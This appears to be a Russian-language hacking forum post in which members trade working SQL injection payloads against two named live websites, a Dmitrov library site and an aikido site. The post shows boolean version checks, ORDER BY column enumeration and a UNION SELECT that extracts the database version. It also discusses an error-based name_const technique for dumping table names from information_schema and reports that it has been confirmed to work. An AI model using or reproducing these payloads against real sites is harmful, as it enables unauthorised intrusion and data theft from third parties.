Цитата:
Сообщение от Nightmare
http://www.dmitrovlib.ru/part/index.php?id=28'
Ещё одна непонятная SQL, вообще без понятия что тут за фильтр.
Сразу ещё один вопрос:
http://1aikido.ru/index.php?id=-1'and(select*from(select(name_const(version(),1)), name_const(version(),1))a)and'
Вывод есть в ошибку, однако мускул < 5.1 что не даёт мне выполнить удобную раскрутку в extractvalue
а как крутить через name_const не понятно...
Кого не затруднит, покажите пример, как вывести с лимитом первую запись table_name из information_schema.tables
|
По поводу первого:
http://www.dmitrovlib.ru/part/index.php?id=(28)and(substring(version(),1,1)=4) - FALSE
http://www.dmitrovlib.ru/part/index.php?id=(28)and(substring(version(),1,1)=5) - TRUE
http://www.dmitrovlib.ru/part/index.php?id=(28)ORDER/**/BY/**/8--+ - FALSE
http://www.dmitrovlib.ru/part/index.php?id=(28)ORDER/**/BY/**/7--+ - TRUE
http://www.dmitrovlib.ru/part/index.php?id=(28)and(1=2)UNION(SELECT(1),2,version (),4,5,6,(7))--+
5.0.89
На счет второго:
Используй вариант, предложенный v1d0q: https://rdot.org/forum/showpost.php?p=20287&postcount=12.
Запрос посылай не через браузер, проверил на твоем примере, работает.